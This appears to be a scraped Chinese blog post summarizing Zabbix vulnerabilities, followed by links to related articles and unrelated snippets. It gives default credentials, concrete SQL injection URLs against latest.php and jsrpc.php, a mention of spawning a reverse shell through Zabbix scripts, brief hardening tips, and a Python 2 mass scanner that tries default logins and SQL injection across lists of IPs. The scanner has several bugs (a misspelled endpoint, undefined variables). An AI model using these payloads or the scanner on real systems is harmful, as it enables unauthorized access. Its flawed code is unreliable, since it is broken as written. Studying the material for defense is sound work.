Zabbix漏洞汇总
一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
""" # import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser #global varites define
ZabbixTarget = None#target ip address!
ZabbixFile = None#target ip address file
BlackList = [
'incorrect',
'<!-- Login Form -->'
] #global config set
logging.basicConfig(level=logging.INFO,format='%(message)s') #global function defines:
def Config_Init():
"""
Take "http://" to the ip address to create targeturl!
"""
global ZabbixTarget
global ZabbixFile
if ZabbixTarget != None:
target = "http://%s"%ZabbixTarget
return [target]
elif ZabbixFile != None:
targetlist = []
with open(ZabbixFile,"r") as fr:
for ip in fr.readlines():
ip = ip.split("\n")[0].split("\r")[0]
target = "http://%s"%str(ip)
targetlist.append(target)
return targetlist
else:
return [] def get_post_data(page_content):
"""
from response html get post data!
"""
postdata = {}
soup = BeautifulSoup(page_content, "html.parser")
for inputparameter in soup.find_all('input'):
if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
postdata[inputparameter['name']] = inputparameter['value']
return postdata def report_file_allinone():
vulnlist = []
scantime = str(datetime.datetime.now())
for parents,dirs,filenames in os.walk("./"):
for filename in filenames:
if filename.find("zabbix_vulnscan_result") >= 0:
with open(filename,"r") as fr:
vulnlist.extend(fr.readlines())
os.remove(filename)
with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
for line in vulnlist:
fw.write(line) #Zabbix Scan Class Defines
class ZabbixScan:
def __init__(self,targetlist):
"""
#class column init!
VulnExpPHPFile:
//0-login-weakpassword
//1-httpmon.php parameter->applicationos
//2-chart_bar.php parameter->itemid
//3-jsrpc.php parameter->profileIdx2
//4-latest.php parameter->toggle_ids[]
//5-OS_Injection->When you login the system you can run you scripts!
TestTarget:
//0-login-weakpassword
//1-jsrpc.php
//2-latest.php
"""
self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
self._targetlist = targetlist #wait for scan target!
self._size = len(self._targetlist)#size of scan target!
self._sqlinjectionurl1_vulnlist = []
self._sqlinjectionurl2_vulnlist = []
self._login_weakpassword_vulnlist = []
self._login_weakpassword_safelist = [] def __del__(self):
del self._weakpassword
del self._targetlist
del self._size
del self._sqlinjectionurl1_vulnlist
del self._sqlinjectionurl2_vulnlist
del self._login_weakpassword_vulnlist
del self._login_weakpassword_safelist def __len__(self):
"""return size of targetlist"""
return self._size def _scan_default_password_login(self):
for authinfo in self._weakpassword:
user = authinfo["username"]
pswd = authinfo["password"]
for target in self._targetlist:
logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
request = requests.session()
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if response.status_code != 200:
self._login_weakpassword_safelist.append(target)
continue
postdata = get_post_data(response.content)
headers["Referer"]=target
postdata["user"] = user
postdata["password"] = pswd
try:
response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if "chkbxRange.init();" in response.content:
for flagstring in BlackList:
if flagstring in response.content:
self._login_weakpassword_safelist.append(target)
self._login_weakpassword_vulnlist.append((target,user,pswd))
else:
self._login_weakpassword_safelist.append(target)
request.close() def _sqlinjectionurl1_scan(self):
logging.info("[*] latest.php sqlinjection scan!")
for vulntarget in self._login_weakpassword_vulnlist:
target = vulntarget[0]
user = vulntarget[1]
pswd = vulntarget[2]
request = requests.session()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
continue
postdata = get_post_data(response.content)
postdata["user"] = user
postdata["password"] = pswd
headers["Referer"]=target
try:
response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
continue
sessionid = response.cookie.values()[0][-16:]
scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
try:
response = request.get(scanurl,timeout=20)
except Exception,ex:
continue
if "SQL syntax" in repsonse:
self._sqlinjectionurl1_vulnlist.append(vulntarget)
else:
request.close() def _sqlinjectionurl2_scan(self):
logging.info("[*] jsrpc.php sqlinjection scan!")
for vulntarget in self._targetlist:
scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(url,headers=headers,timeout=20)
except Exception,ex:
continue
if "ed733b8d10be255eceba344d533586" in response.content:
self._sqlinjectionurl2_vulnlist.append(vulntarget)
else:
pass def scan_run(self):
self._scan_default_password_login()
self._sqlinjectionurl1_scan()
self._sqlinjectionurl2_scan() class scanthread(threading.Thread):
def __init__(self,threadname,targetlist):
threading.Thread.__init__(self,name=threadname)
self.scanner = ZabbixScan(targetlist)
self.name = threadname
self.targetlist = targetlist
def _create_csv(self):
scantime = str(datetime.datetime.now())
with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
for vuln in self.scanner._login_weakpassword_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "weakpassword"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "latest.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = target.split("http://")[-1]
vulntype = "jsrpc.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
def run(self):
#logging.info("[*] %s running!"%self.name)
#logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
self.scanner.scan_run()
self._create_csv()
#logging.info("[*] %s finished!"%self.name) if __name__ == "__main__":
logging.info("[+]*****************************************************************[+]")
logging.info("Zabbix Scan Init!")
parser = OptionParser()
parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
(options, args) = parser.parse_args()
parameterchecklist = [options.iptarget,options.iptargetfile]
if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
logging.error("[-] Target parameters error!")
exit(0)
try:
options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
except Exception,ex:
logging.error("[-] Threadnum parameter error!")
exit(0)
[ZabbixTarget,ZabbixFile] = parameterchecklist
logging.info("[+] Scan Config Init!")
targetlist = Config_Init()
targetsize = len(targetlist)
logging.info("[+] Scan Target Number:%s"%str(targetsize))
logging.info("[+] Scan Threads Init")
threadtargetsize = targetsize/options.threadnum
devidestart = 0
devideend = threadtargetsize
threadlist = []
nameflag = 0
while True:
threadname = "scan-thread-%s"%str(nameflag)
nameflag += 1
if devideend < targetsize:
threadtargetlist = targetlist[devidestart:devideend]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
elif devidestart <= targetsize:
threadtargetlist = targetlist[devidestart:]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
else:
break logging.info("[+] Scan Thread Start!")
for thread in threadlist:
thread.start()
time.sleep(2)
logging.info("[+] %s --Start!"%thread.name)
for thread in threadlist:
thread.join()
logging.info("[+] Scan Finished!")
logging.info("[+] Report Creating!")
report_file_allinone()
logging.info("[+] Report Create!")
exit(0)
Zabbix漏洞汇总的更多相关文章
- Zabbix 漏洞分析
之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
- zabbix漏洞
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0 ...
- Zabbix漏洞学习
Zabbix介绍 zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵 ...
- Zabbix漏洞利用 CVE-2016-10134
最近也是遇见了Zabbix,所以这里以CVE-2016-10134为例复现一下该漏洞 什么是Zabbix? zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. ...
- zabbix 问题汇总
1.Zabbix agent on Zabbix server is unreachable for 5 minutes 查看日志sudo tailf /var/log/zabbix/zabbix_a ...
- 常见Java库漏洞汇总
1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
- struts2远程代码执行漏洞汇总整理
一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
- android CVE 漏洞汇总
arm exploits 技术教程: Learning Pentesting for Android Devices CVE-2015-1530 ,CVE-2015-1474 两个android整数溢 ...
随机推荐
- shell中执行hive命令错误:delimited by end-of-file (wanted `EOF')
错误信息: warning: here-document at line 58 delimited by end-of-file (wanted `EOF') 业务场景,使用hive对数据进行批量清洗 ...
- SecureCRT连接AWS EC2云主机密码登录
申请了亚马逊的EC2,要通过ssh 加密钥的形式登录,特别麻烦,而且感觉ssh登录AWS的云主机后好卡,这里是更改成用户名和密码的形式登录云主机,可以通过SecureCRT直接登录 1.首先通过ssh ...
- 总结golang之map
总结golang之map 2017年04月13日 23:35:53 趁年轻造起来 阅读数:18637 标签: golangmapgo 更多 个人分类: golang 版权声明:本文为博主原创文章, ...
- Tomcat负载均衡和集群环境的搭建
实现此集群的方法参考了网上的很多文章,但由于很多文章都表明是原创的,故无法知道整个操作流程的真正作者是谁.下面就是我用我们真实的项目去实现这个过程.同时修复这过程中一些问题.以下的所有步骤均为亲自测试 ...
- absolute绝对定位的非绝对定位用法
总结: position为absolute的元素如果没有设置left, top等值与left:0;top:0;的的效果是不一样的.例如一个div中有个absolute属性元素,其没有left或是top ...
- 安装 Windows SDK for Windows 7 时遇到的一个问题及解决办法
最近试着用 VS2010 + Qt 开发程序,发现 VS2010 里面没有提供单独的调试器 cdb,这样用 Qt Creator 时就无法设置断点调试,很不方便.想起 Windows SDK for ...
- C语言中带参数的宏
带参数的宏定义有如下的格式: [#define 指令----带参数的宏] #define 标识符(x1,x2,……,xn) 其中 x1,x2,……xn是标志符(宏的参数) 注意:在宏的名字和括号之间 ...
- (转)一种开源的跨平台视频开发框架:VideoLAN - VLC media player
VLC原先是几个法国的大学生做的项目,后来他们把VLC作为了一个开源的项目,吸引了来自世界各国的很多优秀程序员来共同编写和维护VLC,才逐渐变成了现在这个样子.至于为什么叫VideoLan Clien ...
- jquery-file-upload附件上传
引入样式和js文件 <link href="css/bootstrap.min.css" type="text/css" rel="styles ...
- 一篇文看懂Hadoop
我们很荣幸能够见证Hadoop十年从无到有,再到称王.感动于技术的日新月异时,希望通过这篇内容深入解读Hadoop的昨天.今天和明天,憧憬下一个十年. 本文分为技术篇.产业篇.应用篇.展望篇四部分 技 ...